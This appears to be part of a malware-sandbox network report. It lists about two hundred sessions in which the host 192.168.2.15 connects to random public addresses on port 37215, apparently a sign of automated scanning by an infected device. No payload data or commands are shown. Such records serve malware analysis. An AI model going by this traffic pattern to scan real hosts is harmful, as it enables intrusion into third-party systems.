                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12328192.168.2.1555096156.215.183.11537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12329192.168.2.1536848156.110.119.2837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12330192.168.2.1553552156.110.203.24637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12331192.168.2.1550788156.104.243.11937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12332192.168.2.1557402156.172.102.1937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12333192.168.2.1554710156.67.130.7537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12334192.168.2.1532818156.125.247.17937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12335192.168.2.1556160156.135.139.12537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12336192.168.2.1541150156.145.242.24437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12337192.168.2.1547718156.254.176.8737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12338192.168.2.1538988156.232.184.7337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12339192.168.2.1540984156.108.206.11637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12340192.168.2.1558496156.6.101.24837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12341192.168.2.1557962156.190.198.21837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12342192.168.2.1537844156.122.63.24437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12343192.168.2.1551568156.237.17.13637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12344192.168.2.1539244156.8.210.11137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12345192.168.2.1542608156.47.42.11137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12346192.168.2.1551634156.160.79.4237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12347192.168.2.1551090156.230.65.9837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12348192.168.2.1550826156.165.211.12137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12349192.168.2.1558032156.22.130.17337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12350192.168.2.1556006156.197.205.937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12351192.168.2.1540044156.30.105.11737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12352192.168.2.1544030156.85.153.10437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12353192.168.2.1555338156.83.122.19137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12354192.168.2.1556078156.91.35.3837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12355192.168.2.1558980156.205.115.5037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12356192.168.2.1554030156.222.165.5537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12357192.168.2.1546338156.76.233.12737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12358192.168.2.1556908156.8.42.8937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12359192.168.2.1560656156.203.169.4937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12360192.168.2.1560736156.66.198.9537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12361192.168.2.1536306156.17.125.24137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12362192.168.2.1554460156.132.181.15137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12363192.168.2.1554394156.179.88.19737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12364192.168.2.1548382156.97.109.237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12365192.168.2.1547430156.252.177.7037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12366192.168.2.1536746156.200.71.3537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12367192.168.2.1538500156.105.161.3837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12368192.168.2.1555926156.225.48.23737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12369192.168.2.1554262156.104.137.11337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12370192.168.2.1538750156.196.53.3337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12371192.168.2.1547570156.227.181.7837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12372192.168.2.1541972156.189.244.037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12373192.168.2.1555146156.224.136.8537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12374192.168.2.1553258156.251.81.22537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12375192.168.2.1536744156.179.202.13537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12376192.168.2.1546136156.143.31.19037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12377192.168.2.1540082156.28.189.8137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12378192.168.2.1535700156.58.111.15937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12379192.168.2.1550628156.137.4.18437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12380192.168.2.1559928156.41.88.3537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12381192.168.2.1539418156.155.174.16637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12382192.168.2.1551776156.208.91.3837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12383192.168.2.1546306156.157.2.6337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12384192.168.2.1533778156.114.139.19937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12385192.168.2.1549964156.82.7.18737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12386192.168.2.1534296156.147.168.10337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12387192.168.2.1536852156.17.246.14837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12388192.168.2.1543910156.209.139.22237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12389192.168.2.1555366156.235.102.25037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12390192.168.2.1554646156.90.16.6637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12391192.168.2.1539002156.67.180.11137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12392192.168.2.1536394156.196.134.9537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12393192.168.2.1536316156.159.193.8837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12394192.168.2.1540146156.115.207.12237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12395192.168.2.1547688156.146.102.18437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12396192.168.2.1553850156.39.236.13637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12397192.168.2.1550804156.60.129.20637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12398192.168.2.1550160156.185.35.14337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12399192.168.2.1534492156.36.80.17037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12400192.168.2.1552994156.100.68.14737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12401192.168.2.1535122156.88.59.14437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12402192.168.2.1546104156.0.75.7337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12403192.168.2.1558006156.199.14.21237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12404192.168.2.1549294156.76.19.2437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12405192.168.2.1544504156.18.203.9937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12406192.168.2.1545626156.10.182.16537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12407192.168.2.1541196156.102.143.16637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12408192.168.2.1552282156.135.34.14837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12409192.168.2.1547266156.141.226.6637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12410192.168.2.1558996156.126.136.3137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12411192.168.2.1541364156.228.2.12837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12412192.168.2.1554708156.182.98.24737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12413192.168.2.1537316156.156.213.18637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12414192.168.2.1548756156.36.226.6037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12415192.168.2.1551342156.16.52.2437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12416192.168.2.1534338156.192.222.11637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12417192.168.2.1560996156.188.59.15037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12418192.168.2.1548114156.157.44.14537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12419192.168.2.1556048156.50.190.18137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12420192.168.2.1559986156.126.1.10137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12421192.168.2.1556970156.234.160.16737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12422192.168.2.1532964156.4.114.20237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12423192.168.2.1548070156.255.156.7537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12424192.168.2.1547670156.226.116.11437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12425192.168.2.1558280156.140.197.9537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12426192.168.2.1543344156.12.3.2437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12427192.168.2.1554124156.243.96.5937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12428192.168.2.1546048156.235.230.7037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12429192.168.2.1556642156.210.244.16737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12430192.168.2.1549118156.224.15.16237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12431192.168.2.1540926156.172.12.17237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12432192.168.2.1552730156.43.16.13237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12433192.168.2.1545668156.145.83.20737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12434192.168.2.1550942156.210.134.19437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12435192.168.2.1543318156.26.138.12037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12436192.168.2.1548590156.107.47.3937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12437192.168.2.1537968156.251.186.17837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12438192.168.2.1550956156.112.243.3337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12439192.168.2.1544406156.186.209.4537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12440192.168.2.1553518156.76.190.8037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12441192.168.2.1556846156.219.35.24237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12442192.168.2.1534586156.42.105.4537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12443192.168.2.1554972156.175.14.10437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12444192.168.2.1544344156.239.151.16637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12445192.168.2.1547684156.60.252.23237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12446192.168.2.1552012156.60.102.15237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12447192.168.2.1534774156.161.22.4237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12448192.168.2.1550324156.92.159.15937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12449192.168.2.1544772156.142.96.17337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12450192.168.2.1553590156.107.89.17737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12451192.168.2.1541472156.204.169.3037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12452192.168.2.1552386156.177.163.24037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12453192.168.2.1540468156.151.48.5737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12454192.168.2.1539384156.169.57.14037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12455192.168.2.1539698156.74.113.17837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12456192.168.2.1534342156.29.87.12937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12457192.168.2.1536954156.39.71.1137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12458192.168.2.1552802156.129.234.24337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12459192.168.2.1543730156.176.192.7137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12460192.168.2.1560898156.14.224.6437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12461192.168.2.1535158156.32.26.23937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12462192.168.2.1538764156.39.187.20737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12463192.168.2.1556862156.205.38.037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12464192.168.2.1537584156.234.120.24737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12465192.168.2.1543572156.68.41.25237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12466192.168.2.1540028156.231.53.4437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12467192.168.2.1553976156.163.164.25437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12468192.168.2.1541472156.1.84.20037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12469192.168.2.1549832156.132.166.19537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12470192.168.2.1555520156.125.103.22437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12471192.168.2.1560732156.106.94.4537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12472192.168.2.1557370156.7.64.20037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12473192.168.2.1552674156.152.192.14637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12474192.168.2.1553062156.215.4.8337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12475192.168.2.1540110156.20.162.5537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12476192.168.2.1539886156.233.131.17037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12477192.168.2.1535582156.196.16.16137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12478192.168.2.1552408156.158.26.1537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12479192.168.2.1549916156.149.53.10237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12480192.168.2.1549864156.249.116.21837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12481192.168.2.1553590156.99.202.15137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12482192.168.2.1546662156.151.139.13737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12483192.168.2.1536712156.63.165.6737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12484192.168.2.1540494156.82.126.4137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12485192.168.2.1558304156.191.52.21237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12486192.168.2.1545430156.112.93.2737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12487192.168.2.1546804156.188.28.21937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12488192.168.2.1535666156.182.252.11337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12489192.168.2.1555360156.150.44.23437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12490192.168.2.1533954156.170.8.24437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12491192.168.2.1543616156.210.73.9737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12492192.168.2.1539714156.82.64.2737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12493192.168.2.1560646156.54.247.4937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12494192.168.2.1533440156.28.2.24337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12495192.168.2.1558180156.154.129.7537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12496192.168.2.1543582156.191.79.16437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12497192.168.2.1558138197.116.164.22737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12498192.168.2.1535208197.31.41.7037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12499192.168.2.1536318197.178.93.25437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12500192.168.2.1554112197.112.195.7337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12501192.168.2.1557578197.203.109.4637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12502192.168.2.1543582197.218.147.12837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12503192.168.2.1539964197.128.121.12437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12504192.168.2.1536788197.176.128.20737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12505192.168.2.1535024197.149.93.3937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12506192.168.2.1545562197.86.202.1037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12507192.168.2.1549248197.90.95.4937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12508192.168.2.1542676197.56.195.9537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12509192.168.2.1541904197.6.114.12137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12510192.168.2.1541526197.9.102.13137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12511192.168.2.1533658197.84.205.19137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12512192.168.2.1542246197.76.49.3937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12513192.168.2.1550366197.204.10.20037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12514192.168.2.1557100197.14.187.1837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12515192.168.2.1558010197.113.71.19137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12516192.168.2.1548358197.164.39.18037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12517192.168.2.1541930197.131.25.24037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12518192.168.2.1558036197.112.31.5237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12519192.168.2.1552476197.242.144.17737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12520192.168.2.1544630197.118.195.20037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12521192.168.2.1559114197.160.148.9837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12522192.168.2.1541786197.115.143.25537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12523192.168.2.1533324197.106.121.8137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12524192.168.2.1541102197.78.196.2937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12525192.168.2.1534898197.52.142.25537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12526192.168.2.1553746197.106.130.2937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12527192.168.2.1559038197.52.252.10737215
                                                                            TimestampBytes transferredDirectionData


